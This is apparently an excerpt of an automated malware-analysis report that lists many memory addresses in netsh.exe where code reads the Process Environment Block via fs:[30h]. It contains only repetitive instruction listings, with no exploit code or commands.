Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037853CA mov eax, dword ptr fs:[00000030h]	9_2_037853CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037853CA mov eax, dword ptr fs:[00000030h]	9_2_037853CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D5BA5 mov eax, dword ptr fs:[00000030h]	9_2_037D5BA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]	9_2_03734BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]	9_2_03734BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]	9_2_03734BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373B390 mov eax, dword ptr fs:[00000030h]	9_2_0373B390
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732397 mov eax, dword ptr fs:[00000030h]	9_2_03732397
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C138A mov eax, dword ptr fs:[00000030h]	9_2_037C138A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]	9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]	9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]	9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BD380 mov ecx, dword ptr fs:[00000030h]	9_2_037BD380
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h]	9_2_03711B8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h]	9_2_03711B8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0374927A mov eax, dword ptr fs:[00000030h]	9_2_0374927A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h]	9_2_037BB260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h]	9_2_037BB260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8A62 mov eax, dword ptr fs:[00000030h]	9_2_037D8A62
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CEA55 mov eax, dword ptr fs:[00000030h]	9_2_037CEA55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03794257 mov eax, dword ptr fs:[00000030h]	9_2_03794257
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]	9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]	9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]	9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]	9_2_03709240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h]	9_2_03744A2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h]	9_2_03744A2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]	9_2_0372A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]	9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03705210 mov ecx, dword ptr fs:[00000030h]	9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]	9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]	9_2_03705210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h]	9_2_0370AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h]	9_2_0370AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h]	9_2_037CAA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h]	9_2_037CAA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03723A1C mov eax, dword ptr fs:[00000030h]	9_2_03723A1C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03718A0A mov eax, dword ptr fs:[00000030h]	9_2_03718A0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732AE4 mov eax, dword ptr fs:[00000030h]	9_2_03732AE4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732ACB mov eax, dword ptr fs:[00000030h]	9_2_03732ACB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0371AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0371AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373FAB0 mov eax, dword ptr fs:[00000030h]	9_2_0373FAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]	9_2_037052A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]	9_2_0373D294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]	9_2_0373D294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]	9_2_0370B171
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]	9_2_0370B171
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370C962 mov eax, dword ptr fs:[00000030h]	9_2_0370C962
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]	9_2_0372B944
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]	9_2_0372B944
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]	9_2_0373513A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]	9_2_0373513A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120 mov ecx, dword ptr fs:[00000030h]	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]	9_2_03709100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]	9_2_03709100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]	9_2_03709100
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037941E8 mov eax, dword ptr fs:[00000030h]	9_2_037941E8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0370B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0370B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0370B1E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]	9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]	9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]	9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]	9_2_037851BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]	9_2_037361A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]	9_2_037361A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]	9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]	9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]	9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]	9_2_037C49A4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037869A6 mov eax, dword ptr fs:[00000030h]	9_2_037869A6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732990 mov eax, dword ptr fs:[00000030h]	9_2_03732990
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372C182 mov eax, dword ptr fs:[00000030h]	9_2_0372C182
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A185 mov eax, dword ptr fs:[00000030h]	9_2_0373A185
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D1074 mov eax, dword ptr fs:[00000030h]	9_2_037D1074
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2073 mov eax, dword ptr fs:[00000030h]	9_2_037C2073
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]	9_2_03720050
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]	9_2_03720050
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]	9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]	9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]	9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]	9_2_0371B02A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]	9_2_0373002D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]	9_2_037D4015
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]	9_2_037D4015
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]	9_2_03787016
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]	9_2_03787016
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]	9_2_03787016
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]	9_2_037040E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]	9_2_037040E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]	9_2_037040E1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]	9_2_0372B8E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]	9_2_0372B8E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037058EC mov eax, dword ptr fs:[00000030h]	9_2_037058EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0379B8D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373F0BF mov ecx, dword ptr fs:[00000030h]	9_2_0373F0BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]	9_2_0373F0BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]	9_2_0373F0BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037490AF mov eax, dword ptr fs:[00000030h]	9_2_037490AF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03709080 mov eax, dword ptr fs:[00000030h]	9_2_03709080
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]	9_2_03783884
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]	9_2_03783884
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371FF60 mov eax, dword ptr fs:[00000030h]	9_2_0371FF60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8F6A mov eax, dword ptr fs:[00000030h]	9_2_037D8F6A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371EF40 mov eax, dword ptr fs:[00000030h]	9_2_0371EF40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373E730 mov eax, dword ptr fs:[00000030h]	9_2_0373E730
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]	9_2_0372B73D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]	9_2_0372B73D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]	9_2_03704F2E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]	9_2_03704F2E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372F716 mov eax, dword ptr fs:[00000030h]	9_2_0372F716
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]	9_2_0379FF10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]	9_2_0379FF10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]	9_2_037D070D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]	9_2_037D070D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]	9_2_0373A70E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]	9_2_0373A70E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037437F5 mov eax, dword ptr fs:[00000030h]	9_2_037437F5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03718794 mov eax, dword ptr fs:[00000030h]	9_2_03718794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]	9_2_03787794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]	9_2_03787794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]	9_2_03787794
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]	9_2_0372AE73
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371766D mov eax, dword ptr fs:[00000030h]	9_2_0371766D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]	9_2_03717E41
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]	9_2_037CAE44
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]	9_2_037CAE44
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BFE3F mov eax, dword ptr fs:[00000030h]	9_2_037BFE3F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370E620 mov eax, dword ptr fs:[00000030h]	9_2_0370E620
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]	9_2_0373A61C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]	9_2_0373A61C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]	9_2_0370C600
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]	9_2_0370C600
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]	9_2_0370C600
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03738E00 mov eax, dword ptr fs:[00000030h]	9_2_03738E00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1608 mov eax, dword ptr fs:[00000030h]	9_2_037C1608
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037316E0 mov ecx, dword ptr fs:[00000030h]	9_2_037316E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037176E2 mov eax, dword ptr fs:[00000030h]	9_2_037176E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8ED6 mov eax, dword ptr fs:[00000030h]	9_2_037D8ED6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03748EC7 mov eax, dword ptr fs:[00000030h]	9_2_03748EC7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BFEC0 mov eax, dword ptr fs:[00000030h]	9_2_037BFEC0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037336CC mov eax, dword ptr fs:[00000030h]	9_2_037336CC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]	9_2_037D0EA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]	9_2_037D0EA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]	9_2_037D0EA5
